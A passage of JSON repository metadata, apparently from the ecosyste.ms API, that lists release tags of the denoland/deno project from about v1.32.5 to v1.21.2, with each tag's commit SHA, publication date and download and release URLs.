o@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fden